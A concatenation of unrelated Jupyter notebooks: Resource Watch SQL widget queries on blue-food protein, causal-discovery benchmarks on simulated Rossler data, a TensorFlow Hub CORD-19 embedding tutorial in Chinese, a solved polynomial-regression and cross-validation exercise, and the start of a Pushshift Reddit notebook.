LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0
WHERE prop is not null AND coastal = true) ranked
GROUP BY rank, geostore_prod, gid_0) max_rank
WHERE {{geostore_env}} ILIKE '{{geostore_id}}'
```
query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT CONCAT(rank, ' of ', max_rank) AS value FROM (SELECT gid_0, geostore_prod,rank, MAX(rank) OVER (PARTITION BY true) AS max_rank FROM (SELECT gid_0, geostore_prod,RANK() OVER(ORDER BY prop DESC) as rank FROM (SELECT area, SUM(CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END)/NULLIF(SUM(CASE WHEN item = 'Grand Total' THEN value ELSE 0 END),0) prop FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018 GROUP BY area) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE prop is not null AND coastal = true) ranked GROUP BY rank, geostore_prod, gid_0) max_rank WHERE {{geostore_env}} ILIKE '{{geostore_id}}'](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20CONCAT(rank,%20%27%20of%20%27,%20max_rank)%20AS%20value%20FROM%20(SELECT%20gid_0,%20geostore_prod,rank,%20MAX(rank)%20OVER%20(PARTITION%20BY%20true)%20AS%20max_rank%20FROM%20(SELECT%20gid_0,%20geostore_prod,RANK()%20OVER(ORDER%20BY%20prop%20DESC)%20as%20rank%20FROM%20(SELECT%20area,%20SUM(CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END)/NULLIF(SUM(CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END),0)%20prop%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018%20GROUP%20BY%20area)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20prop%20is%20not%20null%20AND%20coastal%20=%20true)%20ranked%20GROUP%20BY%20rank,%20geostore_prod,%20gid_0)%20max_rank%20WHERE%20gid_0%20ILIKE%20%27MEX%27)
## Value
Description: Blue protein as a proportion of total protein
Query:
``` sql
SELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE
WHEN item = 'Ocean-Sourced Foods' THEN value
ELSE 0
END ocean_value,
CASE
WHEN item = 'Grand Total' THEN value
ELSE 0
END total_value
FROM ocn_calcs_015_blue_food_protein_supply
WHERE year = 2018) data
LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0
WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}'
GROUP by area
```
query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END ocean_value, CASE WHEN item = 'Grand Total' THEN value ELSE 0 END total_value FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' GROUP by area](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20SUM(ocean_value)/NULLIF(SUM(total_value),0)*100%20AS%20value%20FROM%20(SELECT%20area,%20year,%20item,%20CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END%20ocean_value,%20CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END%20total_value%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20gadm.gid_0%20ILIKE%20%27MEX%27%20GROUP%20by%20area)
## RW API
- [back office](https://resourcewatch.org/admin/data/widgets/731293a0-b92f-4804-b59c-69a1d794ad73/edit?dataset=9e1b3cad-db6f-44b0-b6fb-048df7b6c680)
- parent dataset [foo_061](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680)
- dataset id ```9e1b3cad-db6f-44b0-b6fb-048df7b6c680```
- widget id: ```731293a0-b92f-4804-b59c-69a1d794ad73```
|
github_jupyter
|
Rossler performance experiments
```
import numpy as np
import torch
import sys
sys.path.append("../")
import utils as utils
import NMC as models
import importlib
```
## SVAM
```
# LiNGAM / SVAM performance with sparse data
import warnings
warnings.filterwarnings("ignore")
for p in [10, 50]:
perf = []
for i in range(20):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
# format for NeuralODE
data = torch.from_numpy(data[:, None, :].astype(np.float32))
from benchmarks.lingam_benchmark import lingam_method
importlib.reload(utils)
graph = lingam_method(data.squeeze().detach())
perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
# DCM
```
# DCM performance with sparse data
for p in [10, 50]:
perf = []
for i in range(10):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
from benchmarks.DCM import DCM_full
graph = DCM_full(data, lambda1=0.001, s=4, w_threshold=0.1)
# plt.matshow(abs(graph),cmap='Reds')
# plt.colorbar()
# plt.show()
perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
# PCMCI
```
# pcmci performance with sparse data
for p in [10, 50]:
perf = []
for i in range(5):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
from benchmarks.pcmci import pcmci
importlib.reload(utils)
graph = pcmci(data)
perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
## NGM
```
# NGM performance with sparse data
import warnings
warnings.filterwarnings("ignore")
for p in [10, 50]:
perf = []
for i in range(5):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
# format for NeuralODE
data = torch.from_numpy(data[:, None, :])
import NMC as models
func = models.MLPODEF(dims=[p, 12, 1], GL_reg=0.1)
# GL training
models.train(func, data, n_steps=2000, plot=False, plot_freq=20)
# AGL training
# weights = func.group_weights()
# func.GL_reg *= (1 / weights)
# func.reset_parameters()
# models.train(func,data,n_steps=1000,plot = True, plot_freq=20)
graph = func.causal_graph(w_threshold=0.1)
perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
|
github_jupyter
|
#### Copyright 2019 The TensorFlow Hub Authors.
Licensed under the Apache License, Version 2.0 (the "License");
```
# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
```
# 探索 TF-Hub CORD-19 Swivel 嵌入向量
<table class="tfo-notebook-buttons" align="left">
<td><a target="_blank" href="https://tensorflow.google.cn/hub/tutorials/cord_19_embeddings_keras"><img src="https://tensorflow.google.cn/images/tf_logo_32px.png">在 TensorFlow.org 上查看 </a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb"><img src="https://tensorflow.google.cn/images/colab_logo_32px.png">在 Google Colab 中运行 </a></td>
<td><a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb"><img src="https://tensorflow.google.cn/images/GitHub-Mark-32px.png">在 GitHub 中查看源代码</a></td>
<td><a href="https://storage.googleapis.com/tensorflow_docs/hub/examples/colab/cord_19_embeddings_keras.ipynb">{img1下载笔记本</a></td>
</table>
TF-Hub (https://tfhub.dev/tensorflow/cord-19/swivel-128d/3) 上的 CORD-19 Swivel 文本嵌入向量模块旨在支持研究员分析与 COVID-19 相关的自然语言文本。这些嵌入针对 [CORD-19 数据集](https://pages.semanticscholar.org/coronavirus-research)中文章的标题、作者、摘要、正文文本和参考文献标题进行了训练。
在此 Colab 中,我们将进行以下操作:
- 分析嵌入向量空间中语义相似的单词
- 使用 CORD-19 嵌入向量在 SciCite 数据集上训练分类器
## 设置
```
import functools
import itertools
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_hub as hub
from tqdm import trange
```
# 分析嵌入向量
首先,我们通过计算和绘制不同术语之间的相关矩阵来分析嵌入向量。如果嵌入向量学会了成功捕获不同单词的含义,则语义相似的单词的嵌入向量应相互靠近。我们来看一些与 COVID-19 相关的术语。
```
# Use the inner product between two embedding vectors as the similarity measure
def plot_correlation(labels, features):
corr = np.inner(features, features)
corr /= np.max(corr)
sns.heatmap(corr, xticklabels=labels, yticklabels=labels)
# Generate embeddings for some terms
queries = [
# Related viruses
'coronavirus', 'SARS', 'MERS',
# Regions
'Italy', 'Spain', 'Europe',
# Symptoms
'cough', 'fever', 'throat'
]
module = hub.load('https://tfhub.dev/tensorflow/cord-19/swivel-128d/3')
embeddings = module(queries)
plot_correlation(queries, embeddings)
```
可以看到,嵌入向量成功捕获了不同术语的含义。每个单词都与其所在簇的其他单词相似(即“coronavirus”与“SARS”和“MERS”高度相关),但与其他簇的术语不同(即“SARS”与“Spain”之间的相似度接近于 0)。
现在,我们来看看如何使用这些嵌入向量解决特定任务。
## SciCite:引用意图分类
本部分介绍了将嵌入向量用于下游任务(如文本分类)的方法。我们将使用 TensorFlow 数据集中的 [SciCite 数据集](https://tensorflow.google.cn/datasets/catalog/scicite)对学术论文中的引文意图进行分类。给定一个带有学术论文引文的句子,对引文的主要意图进行分类:是背景信息、使用方法,还是比较结果。
```
builder = tfds.builder(name='scicite')
builder.download_and_prepare()
train_data, validation_data, test_data = builder.as_dataset(
split=('train', 'validation', 'test'),
as_supervised=True)
#@title Let's take a look at a few labeled examples from the training set
NUM_EXAMPLES = 10#@param {type:"integer"}
TEXT_FEATURE_NAME = builder.info.supervised_keys[0]
LABEL_NAME = builder.info.supervised_keys[1]
def label2str(numeric_label):
m = builder.info.features[LABEL_NAME].names
return m[numeric_label]
data = next(iter(train_data.batch(NUM_EXAMPLES)))
pd.DataFrame({
TEXT_FEATURE_NAME: [ex.numpy().decode('utf8') for ex in data[0]],
LABEL_NAME: [label2str(x) for x in data[1]]
})
```
## 训练引用意图分类器
我们将使用 Keras 在 [SciCite 数据集](https://tensorflow.google.cn/datasets/catalog/scicite)上对分类器进行训练。我们构建一个模型,该模型使用 CORD-19 嵌入向量,并在顶部具有一个分类层。
```
#@title Hyperparameters { run: "auto" }
EMBEDDING = 'https://tfhub.dev/tensorflow/cord-19/swivel-128d/3' #@param {type: "string"}
TRAINABLE_MODULE = False #@param {type: "boolean"}
hub_layer = hub.KerasLayer(EMBEDDING, input_shape=[],
dtype=tf.string, trainable=TRAINABLE_MODULE)
model = tf.keras.Sequential()
model.add(hub_layer)
model.add(tf.keras.layers.Dense(3))
model.summary()
model.compile(optimizer='adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
```
## 训练并评估模型
让我们训练并评估模型以查看在 SciCite 任务上的性能。
```
EPOCHS = 35#@param {type: "integer"}
BATCH_SIZE = 32#@param {type: "integer"}
history = model.fit(train_data.shuffle(10000).batch(BATCH_SIZE),
epochs=EPOCHS,
validation_data=validation_data.batch(BATCH_SIZE),
verbose=1)
from matplotlib import pyplot as plt
def display_training_curves(training, validation, title, subplot):
if subplot%10==1: # set up the subplots on the first call
plt.subplots(figsize=(10,10), facecolor='#F0F0F0')
plt.tight_layout()
ax = plt.subplot(subplot)
ax.set_facecolor('#F8F8F8')
ax.plot(training)
ax.plot(validation)
ax.set_title('model '+ title)
ax.set_ylabel(title)
ax.set_xlabel('epoch')
ax.legend(['train', 'valid.'])
display_training_curves(history.history['accuracy'], history.history['val_accuracy'], 'accuracy', 211)
display_training_curves(history.history['loss'], history.history['val_loss'], 'loss', 212)
```
## 评估模型
我们来看看模型的表现。模型将返回两个值:损失(表示错误的数字,值越低越好)和准确率。
```
results = model.evaluate(test_data.batch(512), verbose=2)
for name, value in zip(model.metrics_names, results):
print('%s: %.3f' % (name, value))
```
可以看到,损失迅速减小,而准确率迅速提高。我们绘制一些样本来检查预测与真实标签的关系:
```
prediction_dataset = next(iter(test_data.batch(20)))
prediction_texts = [ex.numpy().decode('utf8') for ex in prediction_dataset[0]]
prediction_labels = [label2str(x) for x in prediction_dataset[1]]
predictions = [label2str(x) for x in model.predict_classes(prediction_texts)]
pd.DataFrame({
TEXT_FEATURE_NAME: prediction_texts,
LABEL_NAME: prediction_labels,
'prediction': predictions
})
```
可以看到,对于此随机样本,模型大多数时候都会预测正确的标签,这表明它可以很好地嵌入科学句子。
# 后续计划
现在,您已经对 TF-Hub 中的 CORD-19 Swivel 嵌入向量有了更多了解,我们鼓励您参加 CORD-19 Kaggle 竞赛,为从 COVID-19 相关学术文本中获得更深入的科学洞见做出贡献。
- 参加 [CORD-19 Kaggle Challenge](https://www.kaggle.com/allen-institute-for-ai/CORD-19-research-challenge)
- 详细了解 [COVID-19 Open Research Dataset (CORD-19)](https://pages.semanticscholar.org/coronavirus-research)
- 访问 https://tfhub.dev/tensorflow/cord-19/swivel-128d/3,参阅文档并详细了解 TF-Hub 嵌入向量
- 使用 [TensorFlow Embedding Projector](http://projector.tensorflow.org/?config=https://storage.googleapis.com/tfhub-examples/tensorflow/cord-19/swivel-128d/3/tensorboard/projector_config.json) 探索 CORD-19 嵌入向量空间
|
github_jupyter
|
# Polynomial Regression and Cross Validation
For the first assignment we will do something that might seem familiar from *Probability Theory for Machine Learning*; try to fit a polynomial function to a provided dataset. Fitting a function is a quintessential example of *supervised learning*, specifically *regression*, making it a great place to start using machines to learn about *machine learning*. There are several concepts here that are applicable to lots of *supervised learning* algorithms, so it will be good to cover them in a familiar context first.
The notion of a *cost function* will be introduced here, which describes how well a given model fits the provided data. This function can then be minimized in several different ways, depending on complexity of the model and associated cost function, e.g. using *gradient descent* to iteratively approach the minimum or computing the minimum directly using an analytic method, both of which you may have seen some version of before.
We will start with the most basic model (linear) and compute the parameters that minimize the cost function directly, based on the derivate. It is important that you try and comprehend what you are doing in this most basic version (instead of just blindly trying to implement functions until they seem to work), as it will help you understand the more complex models that use the same principles later on. This means actually **watching the linked videos** and computing the partial derivates yourself to verify you understand all of the steps.
The other common concept introduced is model selection using *cross validation*. In this assignment it will be used to determine the degree of the polynomial we are fitting. Both cross validation for model selection and minizing a the cost function to achieve the best possible fit, are used in many other supervised models, like for example *neural networks*.
## Material
The material for this assignment is based on sections **2.6 - 2.8** and **4.6 - 4.8** of the book *[Introduction to Machine Learning](https://www.cmpe.boun.edu.tr/~ethem/i2ml3e/)* by Ethem Alpaydin. In addition, there will be links to videos from Andrew Ng's *[Machine Learning course on Coursera](https://www.coursera.org/learn/machine-learning)* to provide some extra explanations and help create intuitions.
Generally speaking, using built-in functions will be fine for this course, but for this assignment you **may not** use any of the polynomial functions listed [here](https://docs.scipy.org/doc/numpy/reference/routines.polynomials.poly1d.html) or other built-in polynomial solution methods. You can of course use them to check your own implementations work correctly.
In total there are *27* points available in this exercise. Below are some imports to get your started. You do not need to add any code for this cell to work, just make sure you run the cell to actually import the libraries in your notebook.
```
%matplotlib inline
import numpy as np
from numpy.linalg import inv
import matplotlib.pyplot as plt
from IPython.display import YouTubeVideo
```
## Loading the data [1 pt]
Write a function to read the data stored in the file `points.csv` and convert it to a *Numpy* array. Each line in the file is a data point consisting of an **x**-value and **r**-value, separated by a comma. You could use Numpy's [loadtxt](https://docs.scipy.org/doc/numpy/reference/generated/numpy.loadtxt.html), or any other method of your choice to read csv-files and convert that to the correct type.
Test your function and print the resulting array to make sure you know what the data looks like.
```
# YOUR SOLUTION HERE
data = np.loadtxt('points.csv', delimiter=',')
data
```
## Plotting the points [2 pt]
Write a function `split_X_r` to separate your `data` into an X matrix and a R matrix using [slicing](https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html).
Using both vectors, create a graph containing the plotted points you just read from the file. For this you can use the *matplotlib* functions [plot](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.plot) and [show](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.show). A plot of data should be visible below your code. HINT: [You can check the shapes](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html) of X and R, they should both be (30,1).
```
def split_X_R(data):
# YOUR SOLUTION HERE
X = np.array([data[:,0]]).T
R = np.array([data[:,1]]).T
return X, R
# YOUR SOLUTION HERE
X, R = split_X_R(data)
plt.scatter(X, R)
plt.show()
```
## Defining the linear model [1 pt]
Now we are going to try to find the function which best relates these points. We will start by fitting a simple linear function of the form
(2.15) $$g(x) = w_1x + w_0$$
*For more detailed description of linear regression, watch Andrew's videos on the topic. The notation is slightly different, $y$ instead of $r$ for the output, and $\theta$ instead of $w$ for the model parameters, but the actual model is identical.*
```
display(YouTubeVideo('ls7Ke48jCt8'))
display(YouTubeVideo('PBZUjnGuXjA'))
```
Now write a function that computes the predicted output value $g(x)$ given a value of $x$ and the parameters $w_0$ and $w_1$. This should be very straightforward, but make sure you understand what part this plays in our supervised learning problem before moving on.
```
def linear_model(w0, w1, x):
# YOUR SOLUTION HERE
return w0+w1*x
```
## Creating the cost function [2 pt]
The cost function is defined as the sum of the squared errors of each prediction
(2.16) $$E(w_1, w_0|X) = \frac{1}{N}\sum^N_{t=1} [r^t - (w_1x^t + w_0)]^2$$
*These videos are great for building intuition on the relation between the hypothesis function and the associated cost of that hypothesis for the data.*
```
display(YouTubeVideo('EANr4YttXIQ'))
display(YouTubeVideo('J5vJFwQWOaY'))
```
Write a function to compute the cost based on the dataset $X$, $R$ and parameters $w_0$ and $w_1$. Based on your plot of the data, try to estimate some sensible values for $w_0$ and $w_1$ and compute the corresponding cost. Try at least 3 different guesses and print their cost. Order the prints of your guesses from highest to lowest cost.
```
def linear_cost(w0, w1, X, R):
# YOUR SOLUTION HERE
return np.sum((w0+w1*X-R)**2)/len(R)
# Guess 1 w0=-200, w1=100
print(linear_cost(-200, 100, X, R))
# Guess 2 w0=-100, w1=10
print(linear_cost(-100, 10, X, R))
# Guess 3 w0=0, w1=0
print(linear_cost(0, 0, X, R))
```
## Fitting the linear model [4 pt]
We can find the minimum value of the cost function by taking the partial derivatives of that cost function for both of the weights $w_0$ and $w_1$ and setting them equal to $0$, resulting in the equations
(2.17a) $$w_1 = \frac{\sum_tx^tr^t - \bar{x}\bar{r}N}{\sum_t(x^t)^2 - N\bar{x}^2}$$
(2.17b) $$w_0 = \bar{r} - w_1\bar{x}$$
You can compute the partial derivates of equation *2.16* yourself and set them both equal to zero, to check you understand where these two equations come from. Minimizing the cost function gives us the best possible parameters for a linear model predicting the values of the provided dataset. *Note:* If you are unfamiliar with the notation $\bar{x}$, it is defined in *Alpaydin* too, below equation *2.17*.
Write a function which computes the optimal values of $w_0$ and $w_1$ for a dataset consisting of the vectors $X$ and $R$, containing $N$ elements each. Use *matplotlib* again to plot the points, but now also add the line representing the hypothesis function you found. As the line is linear, you can simply plot it by computing the 2 end points and have *matplotlib* draw the connecting line.
Note that with some clever [array operations](https://docs.scipy.org/doc/numpy/reference/routines.array-manipulation.html) and [linear algebra](https://docs.scipy.org/doc/numpy/reference/routines.linalg.html) you can avoid explicitly looping over all the elements in $X$ and $R$ in `linear_fit`, which will make you code a lot faster. However, this is just an optional extra and any working implementation of the equations above will be considered correct.
```
def linear_fit(X, R, N):
# YOUR SOLUTION HERE
xbar = np.mean(X)
rbar = np.mean(R)
w1 = (np.sum(X*R) - xbar*rbar*N) / (np.sum(X**2) - N*xbar**2)
w0 = rbar - w1*xbar
return w0,w1
# YOUR SOLUTION HERE
plt.scatter(X, R)
w0,w1 = linear_fit(X, R, len(R))
y1 = linear_model(w0, w1, -5)
y2 = linear_model(w0, w1, 5)
plt.plot([-5,5], [y1,y2])
plt.show()
```
## Polynomial data [3 pt]
The linear model can easily be extended to polynomials of any order by expanding the original input with the squared input $x^2$, the cubed input $x^3$, etc and adding additional weights to the model. For ease of calculation, the input is also expanded with a vector of $1$'s, to represent the input for the constant parameter $w_0$. The parameters then become $w_0$, $w_1$, $w_2$, etc., one factor for each term of the polynomial.
So if originally the dataset of $N$ elements is of the form $X$ (superscripts are indices here)
$$ X = \left[\begin{array}{c} x^1 \\ x^2 \\ \vdots \\ x^N \end{array} \right]$$
Then the matrix $D$ for a $k^{th}$-order polynomial becomes
$$ D = \left[\begin{array}{cccc}
1 & x^1 & (x^1)^2 & \cdots & (x^1)^k \\
1 & x^2 & (x^2)^2 & \cdots & (x^2)^k \\
\vdots \\
1 & x^N & (x^N)^2 & \cdots & (x^N)^k \\
\end{array} \right]$$
Write a function `create_D_matrix` that constructs this matrix for a given vector $X$ up the specified order $k$. Looking at plots for the dataset we have been using so far, the relationship between the points will probably be at least be quadratic. Use the function to construct a matrix $D$ of order $2$, print the matrix and verify that it looks correct.
```
def create_D_matrix(X, k):
# YOUR SOLUTION HERE
return np.array([X.reshape(len(X),)**i for i in range(k+1)]).T
D = create_D_matrix(X, 2)
```
## Polynomial model [2 pt]
The parameters can now be represented as
$$ w = \left[\begin{array}{c} w_0 \\ w_1 \\ \vdots \\ w_k \end{array} \right]$$
The hypothesis for a single input then just becomes
$$ g(x^1) = \sum_{i=0}^k D^1_iw_i $$
Which can write as a matrix multiplication for all inputs in a single equation
$$ \left[\begin{array}{cccc}
1 & x^1 & (x^1)^2 & \cdots & (x^1)^k \\
1 & x^2 & (x^2)^2 & \cdots & (x^2)^k \\
\vdots \\
1 & x^N & (x^N)^2 & \cdots & (x^N)^k \\
\end{array} \right]
\left[\begin{array}{c} w_0 \\ w_1 \\ \vdots \\ w_k \end{array} \right] = \left[\begin{array}{c} g(x^1) \\ g(x^2) \\ \vdots \\ g(x^N) \end{array} \right]$$
You can do matrix multiplication using the [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) function. Write 2 functions for computing the polynomial below
* `poly_val` should take a single input value $x$ and a vector of polynomial weights $W$ and compute the single hypothesis value for that input. We can use this function later to show the polynomial that we have fitted (just like the function `linear_model`).
* `poly_model` should take a matrix $D$ and weight vector $W$ and compute the corresponding vector of hypotheses.
```
def poly_val(x, W):
# YOUR SOLUTION HERE
return np.dot(np.array([x**i for i in range(len(W))]),W)
def poly_model(D, W):
# YOUR SOLUTION HERE
return np.dot(D, W)
```
## Polynomial cost function and model fitting [3 pts]
And for the cost function we can now use
$$ E(w|X) = \frac{1}{2N} \sum_{t=1}^N [r^t - D^tw]^2$$
Here, we compute the hypothesis $g(x)$ for every example using $D^tw$, take the difference with the actual output $r$ and finally square and sum each difference. Note that this is extremely similar to the mean squared error function we used for the linear case, and also that minimizing this error function is actually equivalent to maximizing the log likelihood of the parameter vector $w$ (see equations $4.31$ and $4.32$).
Now we have the cost function equation and can again take the partial derivative for each of the weights $w_0$ to $w_k$ and set their value equal to $0$. Solving the resulting system of equations will give the set of weights that minimize the cost function. The weights describing this lowest point of the cost function are the parameters which will produce the line that best fits our dataset.
Solving all partial derivate equations for each weight can actually be done with just a couple of matrix operations. Deriving the equation yourself can be a bit involved, but know that the principle is exactly the same as for the linear model computing just $w_0$ and $w_1$. The final equation for weight vector becomes
(4.33) $$ w = (D^TD)^{-1}D^Tr $$
Numpy has built in functions for [transpose](https://docs.scipy.org/doc/numpy/reference/generated/numpy.transpose.html) and [inverse](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.inv.html). Use them to write the code for the following functions.
* `poly_cost` should return the total cost $E$ given $w$, $D$ and $r$. We can use this to see how good a fit is.
* `poly_fit` should return the vector $w$ that bests fits the polynomial relationship between matrix $D$ and vector $r$
Using the quadratic matrix $D$ you constructed earlier and this `poly_fit` function, find the best fitting weights for a quadric polynomial on the data and print these weights
```
def poly_cost(W, D, R):
# YOUR SOLUTION HERE
return np.sum((R - np.dot(D,W))**2) / (2*len(R))
def poly_fit(D, R):
# YOUR SOLUTION HERE
return np.dot(np.dot(inv(np.dot(np.transpose(D),D)),np.transpose(D)),R)
# YOUR SOLUTION HERE
W = poly_fit(D, R)
print(W)
```
## Plotting polynomials [1 pt]
Now lets try and figure out what our fitted quadratic polynomial looks like. As the function is not linear, we will need more than just 2 points to actually plot the line. The easiest solution is to create a whole bunch of x-values as samples, compute the corresponding y-values and plot those. With enough samples the line will look smooth, even if it is connected with linear segments.
To create these x-values samples, we can use the function [linspace](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html). Then just use the `poly_val` function you wrote earlier and apply it to every x-value to compute the array of y-values. Now just plot the original datapoints as dots and the hypothesis as a line, just as for the linear plot. Don't forget to show your plot at the end.
Use these steps to fill in the `poly_plot` function below and show the polynomial function defined by the weights you found for the quadratic polynomial.
```
def poly_plot(W, X, R):
# YOUR SOLUTION HERE
x = np.linspace(-5,5,100)
y = [poly_val(xi, W) for xi in x]
plt.scatter(X,R)
plt.plot(x, y)
plt.show()
poly_plot(W, X, R)
```
## Polynomial order [1 pt]
You can now create a polynomial fit on the data for a polynomial of any order. The next question then becomes: *What order polynomial fits the data the best?*
Using the `create_D_matrix`, `poly_fit` and `poly_plot`, try to fit different order polynomials to the data. Show the plot for the order polynomial you think fits best.
Note that the cost function will most likely decrease with each added polynomial term, as there is more flexibility in the model to fit the data points exactly. However, these weights will fit those few data points very well, but might have very extreme values in between points that would not be good predictors for new inputs. Something like an order 20 polynomial might have a very well fitting shape for the existing data points, but looks like it would be strange predictor at some of the possible other points. Try to find a fit that looks visually like it would generalize well to new points.
```
# YOUR SOLUTION HERE
D = create_D_matrix(X, 4)
W = poly_fit(D, R)
poly_plot(W, X, R)
```
## Cross validation [2 pt]
Another way to answer this same question is to use cross validation. With cross validation you split the data into 2 parts and use one part to fit the model (training set) and the other part to see how well the model fits the remaining data (validation set). This way, we can select a model that is less prone to overfitting.
Write a function below to split the original dataset into 2 sets according to a given ratio. It is important to randomize your division, as simply using the first half of data for the one set and the second half for the other, might result in a strange distribution. You could use a function like [shuffle](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.shuffle.html) for this purpose.
Split the original dataset using a ratio of 0.6 into a training and a validation set. Then for both of these sets, use your old `split_X_R` function to split them into their $X$ and $R$ parts
```
def validation_split(data, ratio):
# YOUR SOLUTION HERE
np.random.shuffle(data)
n = int(ratio*len(data))
training_set = data[:n, :]
validation_set = data[n:, :]
return training_set, validation_set
# YOUR SOLUTION HERE
training_set, validation_set = validation_split(data, 0.6)
train_x, train_r = split_X_R(training_set)
val_x, val_r = split_X_R(validation_set)
```
## Model selection [5 pt]
With this new split of the data you can just repeatedly fit different order polynomials to the training set and see which produces the lowest cost on the validation set. The set of weights with the lowests cost on the validation set generalizes the best to new data and is thus the best overal fit on the dataset.
Write the function `best_poly_fit` below. Try a large range of polynomial orders (like 1 to 50), create the $D$ matrix based on the training set for each order and fit the weights for that polynomial. Then for each of these found weights, also create the D matrix for the validation set and compute the cost using `poly_cost`. Return the set of weights with the lowest cost on the validation set and the corresponding cost.
Run this fitting function with your training and validation sets. Plot the hypothesis function and show the weights that were found and what the cost was. Note that rerunning your validation split code above will result in a different random distribution and thus a slightly different final fit.
```
def best_poly_fit(train_x, train_r, val_x, val_r):
# YOUR SOLUTION HERE
lowest_cost = float('inf')
best_w = 0
for k in range(1,51):
train_D = create_D_matrix(train_x, k)
W = poly_fit(train_D, train_r)
val_D = create_D_matrix(val_x, k)
cost = poly_cost(W, val_D, val_r)
if cost < lowest_cost:
lowest_cost = cost
best_w = W
return best_w, lowest_cost
# YOUR SOLUTION HERE
best_w, lowest_cost = best_poly_fit(train_x, train_r, val_x, val_r)
poly_plot(best_w, X, R)
print('The weights are:\n' +str(best_w)+'\nThe cost is:\n'+str(lowest_cost))
```
|
github_jupyter
|
# Exploring Reddit with the pushshift API
This notebook give you examples of how to use the pushshift API for querying Reddit data.
* Pushshift doc: https://github.com/pushshift/api
* FAQ about Pushshift: https://www.reddit.com/r/pushshift/comments/bcxguf/new_to_pushshift_read_this_faq/
```
import requests
import pandas as pd
```
